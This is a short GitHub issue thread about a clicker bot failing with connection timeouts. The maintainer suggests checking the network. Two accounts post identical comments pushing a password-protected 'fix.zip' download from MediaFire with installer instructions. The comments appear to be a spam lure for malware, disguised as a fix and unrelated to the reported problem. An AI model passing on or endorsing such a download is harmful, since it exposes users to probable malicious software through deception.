### ISSUE TITLE
what can I

### ISSUE THREAD

**Issue by particlec** [Desamod/OkxRacerBot#8]
Select an action:

    1. Run clicker
    2. Create session

> 1
Unable to connect due to network issues: Connection timed out
Unable to connect due to network issues: Connection timed out
Unable to connect due to network issues: Connection timed out
Connection failed! Trying again...
Unable to connect due to network issues: Connection timed out

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Desamod** [comment]
Check your internet connection
